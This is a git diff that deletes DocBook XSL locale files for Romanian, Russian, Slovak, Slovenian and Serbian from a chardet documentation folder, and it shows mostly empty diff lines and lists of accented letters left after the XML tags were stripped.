Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/ro.xml b/chardet/docs/docbook/xsl/common/ro.xml deleted file mode 100644 index 70d8ec1..0000000 --- a/chardet/docs/docbook/xsl/common/ro.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/ru.xml b/chardet/docs/docbook/xsl/common/ru.xml deleted file mode 100644 index 1091f59..0000000 --- a/chardet/docs/docbook/xsl/common/ru.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/sk.xml b/chardet/docs/docbook/xsl/common/sk.xml deleted file mode 100644 index 5df1fef..0000000 --- a/chardet/docs/docbook/xsl/common/sk.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/sl.xml b/chardet/docs/docbook/xsl/common/sl.xml deleted file mode 100644 index f8d966c..0000000 --- a/chardet/docs/docbook/xsl/common/sl.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/sr.xml b/chardet/docs/docbook/xsl/common/sr.xml deleted file mode 100644 index 7973305..0000000 --- a/chardet/docs/docbook/xsl/common/sr.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o - Ò - ò - Ó - ó - Ô - ô - Õ - õ - Ö - ö - Ø - ø - Ō - ō - Ŏ - ŏ - Ő - ő - Ɵ - Ơ - ơ - Ǒ - ǒ - Ǫ - ǫ - Ǭ - ǭ - Ǿ - ǿ - Ȍ - ȍ - Ȏ - ȏ - Ȫ - ȫ - Ȭ - ȭ - Ȯ - ȯ - Ȱ - ȱ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - P - p - Ƥ - ƥ - - - - - Q - q - ʠ - R - r - Ŕ - ŕ - Ŗ - ŗ - Ř - ř - Ȑ - ȑ - Ȓ - ȓ - ɼ - ɽ - ɾ - - - - - - - - - S - s - Ś - ś - Ŝ - ŝ - Ş - ş - Š - š - Ș - ș - ʂ - - - - - - - - - - - T - t - Ţ - ţ - Ť - ť - Ŧ - ŧ - ƫ - Ƭ - ƭ - Ʈ - ʈ - Ț - ț - ȶ - - - - - - - - - - U - u - Ù - ù - Ú - ú - Û - û - Ü - ü - Ũ - ũ - Ū - ū - Ŭ - ŭ - Ů - ů - Ű - ű - Ų - ų - Ư - ư - Ǔ - ǔ - Ǖ - ǖ - Ǘ - ǘ - Ǚ - ǚ - Ǜ - ǜ - Ȕ - ȕ - Ȗ - ȗ - - - - - - - - - - - - - - - - - - - - - - - - - V - v - Ʋ - ʋ - - - - ṿ - W - w - Ŵ - ŵ - - - - - - - - - - - - X - x - - - - - Y - y - Ý - ý - ÿ - Ÿ - Ŷ - ŷ - Ƴ - ƴ - Ȳ - ȳ - - - - - - - - - - - - Z - z - Ź - ź - Ż - ż - Ž - ž - Ƶ - ƶ - Ȥ - ȥ - ʐ - ʑ - - - - - - - - diff --git a/chardet/docs/docbook/xsl/common/sr_Latn.xml b/chardet/docs/docbook/xsl/common/sr_Latn.xml deleted file mode 100644 index 0d2860d..0000000 --- a/chardet/docs/docbook/xsl/common/sr_Latn.xml +++ /dev/null @@ -1,1153 +0,0 @@ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Symbols - A - a - À - à - Á - á -  - â - à - ã - Ä - ä - Å - å - Ā - ā - Ă - ă - Ą - ą - Ǎ - ǎ - Ǟ - ǟ - Ǡ - ǡ - Ǻ - ǻ - Ȁ - ȁ - Ȃ - ȃ - Ȧ - ȧ - - - - - - - - - - - - - - - - - - - - - - - - - - - - B - b - ƀ - Ɓ - ɓ - Ƃ - ƃ - - - - - - - C - c - Ç - ç - Ć - ć - Ĉ - ĉ - Ċ - ċ - Č - č - Ƈ - ƈ - ɕ - - - D - d - Ď - ď - Đ - đ - Ɗ - ɗ - Ƌ - ƌ - Dž - Dz - ȡ - ɖ - - - - - - - - - - - E - e - È - è - É - é - Ê - ê - Ë - ë - Ē - ē - Ĕ - ĕ - Ė - ė - Ę - ę - Ě - ě - Ȅ - ȅ - Ȇ - ȇ - Ȩ - ȩ - - - - - - - - - - - - - - - - - - ế - - - - - - - - - F - f - Ƒ - ƒ - - - G - g - Ĝ - ĝ - Ğ - ğ - Ġ - ġ - Ģ - ģ - Ɠ - ɠ - Ǥ - ǥ - Ǧ - ǧ - Ǵ - ǵ - - - H - h - Ĥ - ĥ - Ħ - ħ - Ȟ - ȟ - ɦ - - - - - - - - - - - - I - i - Ì - ì - Í - í - Î - î - Ï - ï - Ĩ - ĩ - Ī - ī - Ĭ - ĭ - Į - į - İ - Ɨ - ɨ - Ǐ - ǐ - Ȉ - ȉ - Ȋ - ȋ - - - - - - - - - J - j - Ĵ - ĵ - ǰ - ʝ - K - k - Ķ - ķ - Ƙ - ƙ - Ǩ - ǩ - - - - - - - L - l - Ĺ - ĺ - Ļ - ļ - Ľ - ľ - Ŀ - ŀ - Ł - ł - ƚ - Lj - ȴ - ɫ - ɬ - ɭ - - - - - - - - - M - m - ɱ - - ḿ - - - - - N - n - Ñ - ñ - Ń - ń - Ņ - ņ - Ň - ň - Ɲ - ɲ - ƞ - Ƞ - Nj - Ǹ - ǹ - ȵ - ɳ - - - - - - - - - O - o 